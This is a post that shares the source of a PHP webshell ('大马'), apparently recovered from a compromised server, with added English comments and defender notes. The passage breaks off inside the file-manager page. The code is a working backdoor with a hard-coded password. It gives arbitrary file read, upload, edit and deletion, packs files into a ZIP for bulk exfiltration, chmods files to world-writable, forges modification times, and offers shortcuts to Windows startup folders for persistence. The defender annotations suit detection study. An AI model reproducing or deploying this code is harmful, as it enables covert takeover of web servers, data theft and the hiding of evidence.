
php 大马


从别人的shell里面发现的

 

<?php

// Access password for this script, hard-coded in plaintext. How it is checked is
// not visible in this part of the file.
// Defender note: a fixed literal like this, together with the distinctive function
// names below, is a stable string to match on when hunting for copies of this file.
$password = "xiaoke";//set the password

// Report fatal errors only; most filesystem calls below are additionally @-suppressed.
error_reporting(E_ERROR);
// The page is served as GB2312 (Simplified Chinese) HTML.
header("content-Type: text/html; charset=gb2312");
// No execution time limit; presumably so the recursive directory jobs below are not cut off.
set_time_limit(0);

// Recursively removes backslash escaping (stripslashes) from the string values of
// $array, in place, and returns the array.
// Presumably applied to request arrays to undo magic_quotes-style escaping; the call
// site is not in this part of the file.
// Dating note: each() was removed in PHP 8.0, so this sample was written for older runtimes.
function Root_GP(&$array)
{
	while(list($key,$var) = each($array))
	{
		// A key is processed when it differs from its upper-cased form or is integer-like;
		// argc and argv are always left alone.
		if((strtoupper($key) != $key || \'\'.intval($key) == "$key") && $key != \'argc\' && $key != \'argv\')
		{
			if(is_string($var)) $array[$key] = stripslashes($var);
			// Nested arrays are handled by recursion.
			if(is_array($var)) $array[$key] = Root_GP($var);  
		}
	}
	return $array;
}

// Prints the inline stylesheet shared by every panel of the interface.
// Always returns false.
// Defender note: the class names used here (toptd, msgbox, actall) recur in all the
// HTML this script emits, so they are usable as response-body indicators.
function Root_CSS()
{
print<<<END
<style type="text/css">
	*{padding:0; margin:0;}
	body{background:threedface;font-family:"Verdana", "Tahoma", "宋体",sans-serif; font-size:13px;margin-top:3px;margin-bottom:3px;table-layout:fixed;word-break:break-all;}
	a{color:#000000;text-decoration:none;}
	a:hover{background:#BBBBBB;}
	table{color:#000000;font-family:"Verdana", "Tahoma", "宋体",sans-serif;font-size:13px;border:1px solid #999999;}
	td{background:#F9F6F4;}
	.toptd{background:threedface; width:310px; border-color:#FFFFFF #999999 #999999 #FFFFFF; border-style:solid;border-width:1px;}
	.msgbox{background:#FFFFE0;color:#FF0000;height:25px;font-size:12px;border:1px solid #999999;text-align:center;padding:3px;clear:both;}
	.actall{background:#F9F6F4;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;}
</style>\n
END;
return false;
}

// File management (文件管理)
// Minimal in-memory ZIP writer. File_Act() uses it for the "pack and download"
// action, i.e. to bundle several server-side files into one response.
// Only the base name of each file is stored, so directory structure is not kept.
// Defender note: this is the bulk-exfiltration path of the tool; an unusually large
// attachment response from a single PHP file is the network-side symptom.
class packdir
{
	// Finished archive bytes, filled in by packdir().
	var $out = \'\';
	// Local file header + data, one string per archived file.
	var $datasec      = array();
	// Central directory records, one string per archived file.
	var $ctrl_dir     = array();
	// End-of-central-directory signature (PK 05 06) followed by four zero bytes.
	var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
	// Offset of the next local file header inside the archive.
	var $old_offset   = 0;
	// Adds every path in $array to the archive and stores the result in $this->out.
	// Named like the class (PHP 4-style constructor); File_Act() also calls it
	// explicitly as a method. Entries are URL-decoded before being opened.
	// Returns true when the archive was built, false when gzcompress() is unavailable.
	function packdir($array)
	{
		if(@function_exists(\'gzcompress\'))
		{
			for($n = 0;$n < count($array);$n++)
			{
				$array[$n] = urldecode($array[$n]);
				// Whole file is read into memory; all errors are suppressed.
				$fp = @fopen($array[$n], \'r\');
				$filecode = @fread($fp, @filesize($array[$n]));
				@fclose($fp);
				$this -> filezip($filecode,basename($array[$n]));
			}
			// $zhizhen is not assigned anywhere in this method.
			@closedir($zhizhen);
			$this->out = $this->packfile();
			return true;
		}
		return false;
	}
	// Converts a Unix timestamp (0 means "now") into the packed 32-bit MS-DOS
	// date/time value used in ZIP headers. Dates before 1980 are clamped to
	// 1980-01-01 00:00:00; seconds are stored with two-second resolution.
	function at($atunix = 0)
	{
		$unixarr = ($atunix == 0) ? getdate() : getdate($atunix);
		if ($unixarr[\'year\'] < 1980)
		{
			$unixarr[\'year\']    = 1980;
			$unixarr[\'mon\']     = 1;
			$unixarr[\'mday\']    = 1;
			$unixarr[\'hours\']   = 0;
			$unixarr[\'minutes\'] = 0;
			$unixarr[\'seconds\'] = 0;
		} 
		return (($unixarr[\'year\'] - 1980) << 25) | ($unixarr[\'mon\'] << 21) | ($unixarr[\'mday\'] << 16) | ($unixarr[\'hours\'] << 11) | ($unixarr[\'minutes\'] << 5) | ($unixarr[\'seconds\'] >> 1);
	}
	// Appends one file to the archive: builds its local header + deflated data
	// ($datasec) and the matching central directory record ($ctrl_dir).
	// $data is the file content, $name the stored name, $time an optional timestamp.
	function filezip($data, $name, $time = 0)
	{
		$name = str_replace(\'\\\', \'/\', $name);
		$dtime = dechex($this->at($time));
		// The hex digits are rearranged into four escape sequences in little-endian byte order.
		$hexdtime	= \'\x\'.$dtime[6].$dtime[7].\'\x\'.$dtime[4].$dtime[5].\'\x\'.$dtime[2].$dtime[3].\'\x\'.$dtime[0].$dtime[1];
		// eval() turns those escape sequences into raw bytes. Its input comes from
		// dechex() above, not from the request, but the call is still a useful static
		// indicator when scanning for this code.
		eval(\'$hexdtime = "\' . $hexdtime . \'";\');
		// Local file header: signature PK 03 04, version needed, flags, method 8 (deflate), time.
		$fr	= "\x50\x4b\x03\x04";
		$fr	.= "\x14\x00";
		$fr	.= "\x00\x00";
		$fr	.= "\x08\x00";
		$fr	.= $hexdtime;
		$unc_len = strlen($data);
		$crc = crc32($data);
		$zdata = gzcompress($data);
		// Length is taken here, before the wrapper bytes are stripped on the next line.
		$c_len = strlen($zdata);
		// Drop the 2-byte zlib header and 4-byte trailer, leaving the raw deflate stream.
		$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
		$fr .= pack(\'V\', $crc);
		$fr .= pack(\'V\', $c_len);
		$fr .= pack(\'V\', $unc_len);
		$fr .= pack(\'v\', strlen($name));
		$fr .= pack(\'v\', 0);
		$fr .= $name;
		$fr .= $zdata;
		// CRC and both sizes are repeated after the data.
		$fr .= pack(\'V\', $crc);
		$fr .= pack(\'V\', $c_len);
		$fr .= pack(\'V\', $unc_len);
		$this -> datasec[] = $fr;
		$new_offset = strlen(implode(\'\', $this->datasec));
		// Central directory record: signature PK 01 02, then the same fields as the
		// local header plus zeroed extra/comment/disk/attribute fields.
		$cdrec = "\x50\x4b\x01\x02";
		$cdrec .= "\x00\x00";
		$cdrec .= "\x14\x00";
		$cdrec .= "\x00\x00";
		$cdrec .= "\x08\x00";
		$cdrec .= $hexdtime;
		$cdrec .= pack(\'V\', $crc);
		$cdrec .= pack(\'V\', $c_len);
		$cdrec .= pack(\'V\', $unc_len);
		$cdrec .= pack(\'v\', strlen($name) );
		$cdrec .= pack(\'v\', 0 );
		$cdrec .= pack(\'v\', 0 );
		$cdrec .= pack(\'v\', 0 );
		$cdrec .= pack(\'v\', 0 );
		$cdrec .= pack(\'V\', 32 );
		// Offset of this entry's local header; the running offset then advances.
		$cdrec .= pack(\'V\', $this -> old_offset );
		$this -> old_offset = $new_offset;
		$cdrec .= $name;
		$this -> ctrl_dir[] = $cdrec;
	}
	// Returns the complete archive: all file sections, the central directory, and the
	// end-of-central-directory record (entry counts, directory size, directory offset,
	// zero-length comment).
	function packfile()
	{
		$data    = implode(\'\', $this -> datasec);
		$ctrldir = implode(\'\', $this -> ctrl_dir);
		return $data.$ctrldir.$this -> eof_ctrl_dir.pack(\'v\', sizeof($this -> ctrl_dir)).pack(\'v\', sizeof($this -> ctrl_dir)).pack(\'V\', strlen($ctrldir)).pack(\'V\', strlen($data))."\x00\x00";
	}
}

// Normalises a path string: backslashes become forward slashes, then each "//" is
// replaced by "/" in a single pass. No other validation or canonicalisation is done,
// so ".." segments pass through unchanged.
function File_Str($string)
{
	return str_replace(\'//\',\'/\',str_replace(\'\\\',\'/\',$string));
}

// Formats a byte count for display, rounded to two decimals, with a G / M / K / B
// suffix. Each threshold is strict: exactly 1024 bytes is still shown in B.
function File_Size($size)
{
	if($size > 1073741824) $size = round($size / 1073741824 * 100) / 100 . \' G\';
	elseif($size > 1048576) $size = round($size / 1048576 * 100) / 100 . \' M\';
	elseif($size > 1024) $size = round($size / 1024 * 100) / 100 . \' K\';
	else $size = $size . \' B\';
	return $size;
}

// Estimates the on-disk web root: takes the real path of the current directory and
// cuts off as many trailing characters as the script's URL directory (from PHP_SELF)
// is long. The result is only correct when the URL path mirrors the directory layout.
function File_Mode()
{
	$RealPath = realpath(\'./\');
	$SelfPath = $_SERVER[\'PHP_SELF\'];
	// Keep only the directory part of the script URL.
	$SelfPath = substr($SelfPath, 0, strrpos($SelfPath,\'/\'));
	return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
}

// Reads and returns the whole content of $filename (binary mode).
// Every call is @-suppressed, so a missing or unreadable file produces no warning.
// No restriction is placed on which path may be read.
function File_Read($filename)
{
	$handle = @fopen($filename,"rb");
	$filecode = @fread($handle,@filesize($filename));
	@fclose($handle);
	return $filecode;
}

// Writes $filecode to $filename using fopen mode $filemode and returns true/false.
// If the first write fails, the file is made world-writable (0666) and the write is
// retried once on the same handle.
// Defender note: files left at mode 0666 next to modified content are a side effect
// of this retry path and worth checking for during clean-up.
function File_Write($filename,$filecode,$filemode)
{
	$key = true;
	$handle = @fopen($filename,$filemode);
	// fwrite() returning 0 or false both count as failure here.
	if(!@fwrite($handle,$filecode))
	{
		@chmod($filename,0666);
		$key = @fwrite($handle,$filecode) ? true : false;
	}
	@fclose($handle);
	return $key;
}

// Stores an uploaded temporary file $filea at destination $fileb.
// Tries copy() first and falls back to move_uploaded_file(); returns true on success.
// Neither the destination path nor the file type is checked.
function File_Up($filea,$fileb)
{
	$key = @copy($filea,$fileb) ? true : false;
	if(!$key) $key = @move_uploaded_file($filea,$fileb) ? true : false;
	return $key;
}

// Sends $filename to the client as an attachment and terminates the script.
// Returns false when the file does not exist; otherwise it never returns (exit).
// The Content-type is built as "application/x-" plus the text after the last dot of
// the base name. Any readable path can be requested this way.
function File_Down($filename)
{
	if(!file_exists($filename)) return false;
	$filedown = basename($filename);
	$array = explode(\'.\', $filedown);
	$arrayend = array_pop($array);
	header(\'Content-type: application/x-\'.$arrayend);
	header(\'Content-Disposition: attachment; filename=\'.$filedown);
	header(\'Content-Length: \'.filesize($filename));
	@readfile($filename);
	exit;
}

// Recursively deletes directory $deldir with everything in it.
// Each entry is first set to mode 0777 so permission bits do not block removal.
// Returns false when the directory cannot be opened, otherwise the result of the
// final rmdir(). Failures on individual entries are suppressed and not reported.
function File_Deltree($deldir)
{
	if(($mydir = @opendir($deldir)) == NULL) return false;	
	while(false !== ($file = @readdir($mydir)))
	{
		$name = File_Str($deldir.\'/\'.$file);
		// Sub-directories (except . and ..) are emptied by recursion.
		if((is_dir($name)) && ($file!=\'.\') && ($file!=\'..\')){@chmod($name,0777);File_Deltree($name);}
		if(is_file($name)){@chmod($name,0777);@unlink($name);}
	} 
	@closedir($mydir);
	@chmod($deldir,0777);
	return @rmdir($deldir) ? true : false;
}

// Applies one batch action to a list of files and returns a status message.
//   $array  - URL-encoded file paths (the "files[]" checkboxes of the listing)
//   $actall - action code: a = copy, b = delete, c = chmod, d = set mtime, e = zip + download
//   $inver  - action argument: target directory, octal mode, date string, or download name
// In File_a() all three values are passed in straight from $_POST.
// Defender note: action d rewrites modification times, so mtime is not reliable
// evidence for files this tool has handled.
function File_Act($array,$actall,$inver)
{
	// Message: "please select a file".
	if(($count = count($array)) == 0) return \'请选择文件\';
	if($actall == \'e\')
	{
		// Pack the selected files into a ZIP and send it as an attachment named $inver.
		$zip = new packdir;
		if($zip->packdir($array)){$spider = $zip->out;header("Content-type: application/unknown");header("Accept-Ranges: bytes");header("Content-length: ".strlen($spider));header("Content-disposition: attachment; filename=".$inver.";");echo $spider;exit;}
		// Message: "packing the selected files failed".
		return \'打包所选文件失败\';
	}
	$i = 0;
	while($i < $count)
	{
		$array[$i] = urldecode($array[$i]);
		switch($actall)
		{
			// a: copy the file into directory $inver (message: "path error" if it is not a directory).
			case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return \'路径错误\'; $filename = array_pop(explode(\'/\',$array[$i])); @copy($array[$i],File_Str($inver.\'/\'.$filename)); $msg = \'复制到\'.$inver.\'目录\'; break;
			// b: delete the file, retrying once after a chmod.
			case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = \'删除\'; break;
			// c: chmod to a four-digit octal mode (message: "invalid mode value" otherwise).
			case "c" : if(!eregi("^[0-7]{4}$",$inver)) return \'属性值错误\'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = \'属性修改为\'.$inver; break;
			// d: set the modification time to the parsed date string.
			case "d" : @touch($array[$i],strtotime($inver)); $msg = \'修改时间为\'.$inver; break;
		}
		$i++;
	}
	// Message: "selected files <action> done".
	return \'所选文件\'.$msg.\'完毕\';
}

// Prints the file editor panel for $filepath/$filename.
//   $dim - text pre-filled into the in-page search box
// An existing file is loaded HTML-escaped into the textarea with its current mtime;
// otherwise the editor starts empty with the current time.
// The form posts pfn (target path), pfc (content) and mtime to "?s=a", where File_a()
// writes the file and then sets its modification time to the submitted value.
// The date format is checked only by the client-side CheckDate() script.
// Defender note: POST bodies carrying pfn/pfc/mtime together are a request-side
// indicator of this editor being used.
function File_Edit($filepath,$filename,$dim = \'\')
{
	$THIS_DIR = urlencode($filepath);
	$THIS_FILE = File_Str($filepath.\'/\'.$filename);
	if(file_exists($THIS_FILE)){$FILE_TIME = @date(\'Y-m-d H:i:s\',filemtime($THIS_FILE));$FILE_CODE = htmlspecialchars(File_Read($THIS_FILE));}
	else {$FILE_TIME = @date(\'Y-m-d H:i:s\',time());$FILE_CODE = \'\';}
print<<<END
<script language="javascript">
var NS4 = (document.layers);
var IE4 = (document.all);
var win = this;
var n = 0;
function search(str){
	var txt, i, found;
	if(str == "")return false;
	if(NS4){
		if(!win.find(str)) while(win.find(str, false, true)) n++; else n++;
		if(n == 0) alert(str + " ... Not-Find")
	}
	if(IE4){
		txt = win.document.body.createTextRange();
		for(i = 0; i <= n && (found = txt.findText(str)) != false; i++){
			txt.moveStart("character", 1);
			txt.moveEnd("textedit")
		}
		if(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++}
		else{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")}
	}
	return false
}
function CheckDate(){
	var re = document.getElementById(\'mtime\').value;
	var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; 
	var r = re.match(reg);
	if(r==null){alert(\'日期格式不正确!格式:yyyy-mm-dd hh:mm:ss\');return false;}
	else{document.getElementById(\'editor\').submit();}
}
</script>
<div class="actall">查找内容: <input name="searchs" type="text" value="{$dim}" style="width:500px;">
<input type="button" value="查找" onclick="search(searchs.value)"></div>
<form method="POST" id="editor" action="?s=a&p={$THIS_DIR}">
<div class="actall"><input type="text" name="pfn" value="{$THIS_FILE}" style="width:750px;"></div>
<div class="actall"><textarea name="pfc" id style="width:750px;height:380px;">{$FILE_CODE}</textarea></div>
<div class="actall">文件修改时间 <input type="text" name="mtime" id="mtime" value="{$FILE_TIME}" style="width:150px;"></div>
<div class="actall"><input type="button" value="保存" onclick="CheckDate();" style="width:80px;">
<input type="button" value="返回" onclick="window.location=\'?s=a&p={$THIS_DIR}\';" style="width:80px;"></div>
</form>
END;
}

// Batch upload panel: accepts up to eight files ("soup[]") and stores them in the
// directory given by POST field "updir", optionally under new names from "reup[]".
//   $p - directory shown as the default upload target
// Destination directory and file names come straight from the request; the default
// message even suggests "new.php" as a rename example, i.e. script files are expected.
// Defender note: multipart POSTs to "?s=q" with soup[]/reup[]/updir fields are the
// request-side indicator; newly created script files in web-served directories are
// the host-side one.
function File_Soup($p)
{
	$THIS_DIR = urlencode($p);
	$UP_SIZE = get_cfg_var(\'upload_max_filesize\');
	// Message: "max size per attachment: ..., rename format (new.php), empty keeps the original name".
	$MSG_BOX = \'单个附件允许大小:\'.$UP_SIZE.\', 改名格式(new.php),如为空,则保持原文件名.\';
	if(!empty($_POST[\'updir\']))
	{
		if(count($_FILES[\'soup\']) >= 1)
		{
			$i = 0;
			foreach ($_FILES[\'soup\'][\'error\'] as $key => $error)
			{
				if ($error == UPLOAD_ERR_OK)
				{
					$souptmp = $_FILES[\'soup\'][\'tmp_name\'][$key];
					// A non-empty rename field overrides the client-supplied file name.
					if(!empty($_POST[\'reup\'][$i]))$soupname = $_POST[\'reup\'][$i]; else $soupname = $_FILES[\'soup\'][\'name\'][$key];
					// Per-slot status text: "<name> upload succeeded" / "<name> upload failed".
					$MSG[$i] = File_Up($souptmp,File_Str($_POST[\'updir\'].\'/\'.$soupname)) ? $soupname.\'上传成功\' : $soupname.\'上传失败\';
				}
				$i++;
			}
		}
		else
		{
			// Message: "please select a file".
			$MSG_BOX = \'请选择文件\';
		}
	}
print<<<END
<div class="msgbox">{$MSG_BOX}</div>
<form method="POST" id="editor" action="?s=q&p={$THIS_DIR}" enctype="multipart/form-data">
<div class="actall">上传到目录: <input type="text" name="updir" value="{$p}" style="width:531px;height:22px;"></div>
<div class="actall">附件1 <input type="file" name="soup[]" style="width:300px;height:22px;"> 改名 <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[0] </div>
<div class="actall">附件2 <input type="file" name="soup[]" style="width:300px;height:22px;"> 改名 <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[1] </div>
<div class="actall">附件3 <input type="file" name="soup[]" style="width:300px;height:22px;"> 改名 <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[2] </div>
<div class="actall">附件4 <input type="file" name="soup[]" style="width:300px;height:22px;"> 改名 <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[3] </div>
<div class="actall">附件5 <input type="file" name="soup[]" style="width:300px;height:22px;"> 改名 <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[4] </div>
<div class="actall">附件6 <input type="file" name="soup[]" style="width:300px;height:22px;"> 改名 <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[5] </div>
<div class="actall">附件7 <input type="file" name="soup[]" style="width:300px;height:22px;"> 改名 <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[6] </div>
<div class="actall">附件8 <input type="file" name="soup[]" style="width:300px;height:22px;"> 改名 <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[7] </div>
<div class="actall"><input type="submit" value="上传" style="width:80px;"> <input type="button" value="返回" onclick="window.location=\'?s=a&p={$THIS_DIR}\';" style="width:80px;"></div>
</form>
END;
}

// Main file-manager view for directory $p. It first executes whatever action the
// request carries, then prints the toolbar and a listing (directories first, then files).
// Request parameters handled here, all taken unvalidated from $_GET / $_POST / $_FILES:
//   pfn, pfc, mtime     - write content to a path, then set its modification time
//   ufp, ufn            - single-file upload into the current directory, optional new name
//   actall, files, inver - batch action, forwarded to File_Act()
//   mk, md              - chmod one entry to a four-digit octal mode
//   mn, rn              - rename an entry
//   dn                  - create a directory (mode 0777)
//   dd                  - recursively delete a directory
//   df                  - download a file
// Returns false when $p cannot be opened (the page header is already printed by
// then), true otherwise.
// Defender note: this parameter set, together with "s=a&p=<path>" in the query
// string, is what to search web access logs for when this file is found on a host.
// The directory dropdown also offers Windows startup folders as shortcuts, so files
// written there are worth checking on Windows servers.
function File_a($p)
{
	// Base URL used to turn on-disk paths into clickable links.
	if(!$_SERVER[\'SERVER_NAME\']) $GETURL = \'\'; else $GETURL = \'http://\'.$_SERVER[\'SERVER_NAME\'].\'/\';
	// Default status text: "waiting for message queue".
	$MSG_BOX = \'等待消息队列\';
	$UP_DIR = urlencode(File_Str($p.\'/..\'));
	$REAL_DIR = File_Str(realpath($p));
	$FILE_DIR = File_Str(dirname(__FILE__));
	$ROOT_DIR = File_Mode();
	$THIS_DIR = urlencode(File_Str($REAL_DIR));
	$NUM_D = 0;
	$NUM_F = 0;
	// Save from the editor: write pfc to pfn, then set the file's mtime to the submitted value.
	if(!empty($_POST[\'pfn\'])){$intime = @strtotime($_POST[\'mtime\']);$MSG_BOX = File_Write($_POST[\'pfn\'],$_POST[\'pfc\'],\'wb\') ? \'编辑文件 \'.$_POST[\'pfn\'].\' 成功\' : \'编辑文件 \'.$_POST[\'pfn\'].\' 失败\';@touch($_POST[\'pfn\'],$intime);}
	// Single upload into the current directory; ufn overrides the client file name.
	if(!empty($_FILES[\'ufp\'][\'name\'])){if($_POST[\'ufn\'] != \'\') $upfilename = $_POST[\'ufn\']; else $upfilename = $_FILES[\'ufp\'][\'name\'];$MSG_BOX = File_Up($_FILES[\'ufp\'][\'tmp_name\'],File_Str($REAL_DIR.\'/\'.$upfilename)) ? \'上传文件 \'.$upfilename.\' 成功\' : \'上传文件 \'.$upfilename.\' 失败\';}
	// Batch action on the ticked files.
	if(!empty($_POST[\'actall\'])){$MSG_BOX = File_Act($_POST[\'files\'],$_POST[\'actall\'],$_POST[\'inver\']);}
	// chmod of a single entry.
	if(isset($_GET[\'md\'])){$modfile = File_Str($REAL_DIR.\'/\'.$_GET[\'mk\']); if(!eregi("^[0-7]{4}$",$_GET[\'md\'])) $MSG_BOX = \'属性值错误\'; else $MSG_BOX = @chmod($modfile,base_convert($_GET[\'md\'],8,10)) ? \'修改 \'.$modfile.\' 属性为 \'.$_GET[\'md\'].\' 成功\' : \'修改 \'.$modfile.\' 属性为 \'.$_GET[\'md\'].\' 失败\';}
	// Rename.
	if(isset($_GET[\'mn\'])){$MSG_BOX = @rename(File_Str($REAL_DIR.\'/\'.$_GET[\'mn\']),File_Str($REAL_DIR.\'/\'.$_GET[\'rn\'])) ? \'改名 \'.$_GET[\'mn\'].\' 为 \'.$_GET[\'rn\'].\' 成功\' : \'改名 \'.$_GET[\'mn\'].\' 为 \'.$_GET[\'rn\'].\' 失败\';}
	// Create directory.
	if(isset($_GET[\'dn\'])){$MSG_BOX = @mkdir(File_Str($REAL_DIR.\'/\'.$_GET[\'dn\']),0777) ? \'创建目录 \'.$_GET[\'dn\'].\' 成功\' : \'创建目录 \'.$_GET[\'dn\'].\' 失败\';}
	// Recursive directory delete.
	if(isset($_GET[\'dd\'])){$MSG_BOX = File_Deltree($_GET[\'dd\']) ? \'删除目录 \'.$_GET[\'dd\'].\' 成功\' : \'删除目录 \'.$_GET[\'dd\'].\' 失败\';}
	// Download; File_Down() exits on success, so the message is only set on failure.
	if(isset($_GET[\'df\'])){if(!File_Down($_GET[\'df\'])) $MSG_BOX = \'下载文件不存在\';}
	Root_CSS();
print<<<END
<script type="text/javascript">
	function Inputok(msg,gourl)
	{
		smsg = "当前文件:[" + msg + "]";
		re = prompt(smsg,unescape(msg));
		if(re)
		{
			var url = gourl + escape(re);
			window.location = url;
		}
	}
	function Delok(msg,gourl)
	{
		smsg = "确定要删除[" + unescape(msg) + "]吗?";
		if(confirm(smsg))
		{
			if(gourl == \'b\')
			{
				document.getElementById(\'actall\').value = escape(gourl);
				document.getElementById(\'fileall\').submit();
			}
			else window.location = gourl;
		}
	}
	function CheckDate(msg,gourl)
	{
		smsg = "当前文件时间:[" + msg + "]";
		re = prompt(smsg,msg);
		if(re)
		{
			var url = gourl + re;
			var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; 
			var r = re.match(reg);
			if(r==null){alert(\'日期格式不正确!格式:yyyy-mm-dd hh:mm:ss\');return false;}
			else{document.getElementById(\'actall\').value = gourl; document.getElementById(\'inver\').value = re; document.getElementById(\'fileall\').submit();}
		}
	}
	function CheckAll(form)
	{
		for(var i=0;i<form.elements.length;i++)
		{
			var e = form.elements[i];
			if (e.name != \'chkall\')
			e.checked = form.chkall.checked;
		}
	}
	function SubmitUrl(msg,txt,actid)
	{
		re = prompt(msg,unescape(txt));
		if(re)
		{
			document.getElementById(\'actall\').value = actid;
			document.getElementById(\'inver\').value = escape(re);
			document.getElementById(\'fileall\').submit();
		}
	}
</script>
	<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
	<div class="actall" style="text-align:center;padding:3px;">
	<form method="GET"><input type="hidden" id="s" name="s" value="a">
	<input type="text" name="p" value="{$REAL_DIR}" style="width:550px;height:22px;">
	<select onchange="location.href=\'?s=a&p=\'+options[selectedIndex].value">
	<option>---特殊目录---</option>
	<option value="{$ROOT_DIR}"> 网站根目录 </option>
	<option value="{$FILE_DIR}"> 本程序目录 </option>
	<option value="C:/Documents and Settings/All Users/「开始」菜单/程序/启动"> 所有组启动项 </option>
	<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup"> 英文启动项 </option>
	<option value="C:/RECYCLER"> RECYCLER </option>
	<option value="C:/Program Files"> Program Files </option>
	</select> <input type="submit" value="转到" style="width:50px;"></form>
	<div style="margin-top:3px;"></div>
	<form method="POST" action="?s=a&p={$THIS_DIR}" enctype="multipart/form-data">
	<input type="button" value="新建文件" onclick="Inputok(\'newfile.php\',\'?s=p&fp={$THIS_DIR}&fn=\');">
	<input type="button" value="新建目录" onclick="Inputok(\'newdir\',\'?s=a&p={$THIS_DIR}&dn=\');"> 
	<input type="button" value="批量上传" onclick="window.location=\'?s=q&p={$REAL_DIR}\';"> 
	<input type="file" name="ufp" style="width:300px;height:22px;">
	<input type="text" name="ufn" style="width:121px;height:22px;">
	<input type="submit" value="上传" style="width:50px;">
	</form>
	</div>
	<form method="POST" name="fileall" id="fileall" action="?s=a&p={$THIS_DIR}">
	<table border="0"><tr>
	<td class="toptd" style="width:450px;"> <a href="?s=a&p={$UP_DIR}"><b>上级目录</b></a> </td>
	<td class="toptd" style="width:80px;"> 操作 </td>
	<td class="toptd" style="width:48px;"> 属性 </td>
	<td class="toptd" style="width:173px;"> 修改时间 </td>
	<td class="toptd" style="width:75px;"> 大小 </td></tr>
END;
	if(($h_d = @opendir($p)) == NULL) return false;
	// First pass: one row per sub-directory, with delete / rename / chmod links.
	while(false !== ($Filename = @readdir($h_d)))
	{
		if($Filename == \'.\' or $Filename == \'..\') continue;
		$Filepath = File_Str($REAL_DIR.\'/\'.$Filename);
		if(is_dir($Filepath))
		{
			// Last four octal digits of the permission bits.
			$Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4);
			$Filetime = @date(\'Y-m-d H:i:s\',@filemtime($Filepath));
			$Filepath = urlencode($Filepath);
			echo "\r\n".\' <tr><td> <a href="?s=a&p=\'.$Filepath.\'"><font face="wingdings" size="3">0</font><b> \'.$Filename.\' </b></a> </td> \';
			$Filename = urlencode($Filename);
			echo \' <td> <a href="#" onclick="Delok(\\'\'.$Filename.\'\\',\\'?s=a&p=\'.$THIS_DIR.\'&dd=\'.$Filename.\'\\');return false;"> 删除 </a> \';
			echo \' <a href="#" onclick="Inputok(\\'\'.$Filename.\'\\',\\'?s=a&p=\'.$THIS_DIR.\'&mn=\'.$Filename.\'&rn=\\');return false;"> 改名 </a> </td> \';
			echo \' <td> <a href="#" onclick="Inputok(\\'\'.$Fileperm.\'\\',\\'?s=a&p=\'.$THIS_DIR.\'&mk=\'.$Filename.\'&md=\\');return false;"> \'.$Fileperm.\' </a> </td> \';
			echo \' <td>\'.$Filetime.\'</td> \';
			echo \' <td> </td> </tr>\'."\r\n";
			$NUM_D++;
		}
	}
	// Second pass over the same handle: one row per regular file.
	@rewinddir($h_d);
	while(false !== ($Filename = @readdir($h_d)))
	{
		if($Filename == \'.\' or $Filename == \'..\') continue;
		$Filepath = File_Str($REAL_DIR.\'/\'.$Filename);
		if(!is_dir($Filepath))
		{
			// Map the on-disk path to a URL by swapping the web-root prefix for the base URL.
			$Fileurls = str_replace(File_Str($ROOT_DIR.\'/\'),$GETURL,$Filepath);
			$Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4);
			$Filetime = @date(\'Y-m-d H:i:s\',@filemtime($Filepath));
			$Filesize = File_Size(@filesize($Filepath));
			// The script's own file is highlighted in dark red.
			if($Filepath == File_Str(__FILE__)) $fname = \'<font color="#8B0000">\'.$Filename.\'</font>\'; else $fname = $Filename;
			echo "\r\n".\' <tr><td> <input type="checkbox" name="files[]" value="\'.urlencode($Filepath).\'"><a target="_blank" href="\'.$Fileurls.\'">\'.$fname.\'</a> </td>\';
			$Filepath = urlencode($Filepath);
			$Filename = urlencode($Filename);
			echo \' <td> <a href="?s=p&fp=\'.$THIS_DIR.\'&fn=\'.$Filename.\'"> 编辑 </a> \';
			echo \' <a href="#" onclick="Inputok(\\'\'.$Filename.\'\\',\\'?s=a&p=\'.$THIS_DIR.\'&mn=\'.$Filename.\'&rn=\\');return false;"> 改名 </a> </td>\';
			echo \' <td>\'.$Fileperm.\'</td> \';
			echo \' <td>\'.$Filetime.\'</td> \';
			echo \' <td align="right"> <a href="?s=a&df=\'.$Filepath.\'">\'.$Filesize.\'</a> </td></tr> \'."\r\n";
			$NUM_F++;
		}
	}
	@closedir($h_d);
	// Fallback date offered by the "set time" prompt when the listing produced none.
	if(!$Filetime) $Filetime = \'2009-01-01 00:00:00\';
print<<<END
</table>
<div class="actall"> <input type="hidden" id="actall" name="actall" value="undefined"> 
<input type="hidden" id="inver" name="inver" value="undefined"> 
<input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form);"> 
<input type="button" value="复制" onclick="SubmitUrl(\'复制所选文件到路径: \',\'{$THIS_DIR}\',\'a\');return false;"> 
<input type="button" value="删除" onclick="Delok(\'所选文件\',\'b\');return false;"> 
<input type="button" value="属性" onclick="SubmitUrl(\'修改所选文件属性值为: \',\'0666\',\'c\');return false;"> 
<input type="button" value="时间" onclick="CheckDate(\'{$Filetime}\',\'d\');return false;"> 
<input type="button" value="打包" onclick="SubmitUrl(\'打包并下载所选文件下载名为: \',\'spider.tar.gz\',\'e\');return false;"> 
